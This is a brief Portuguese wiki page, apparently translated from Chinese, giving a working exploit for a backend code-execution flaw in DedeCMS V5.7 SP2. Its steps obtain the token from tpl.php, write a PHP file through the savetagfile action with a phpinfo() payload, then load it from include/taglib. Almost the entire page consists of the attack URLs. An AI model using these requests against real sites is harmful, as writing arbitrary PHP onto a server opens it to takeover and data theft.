Vulnerabilidade de execução de código em segundo plano DedeCMS V5.7 SP2

This page is a translated version of the page DedeCMS V5.7 SP2 後台代碼執行漏洞 and the translation is 100% complete.

Other languages:

Exploit

Primeiro, pegue o token: domain + /dede/tpl.php?action=upload

O token pode ser obtido visualizando o código-fonte da página

http://127.0.0.1/uploads/dede/tpl.php?action=upload

Então visite:

http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=<TOKEN>

http://127.0.0.1/include/taglib/secnote.lib.php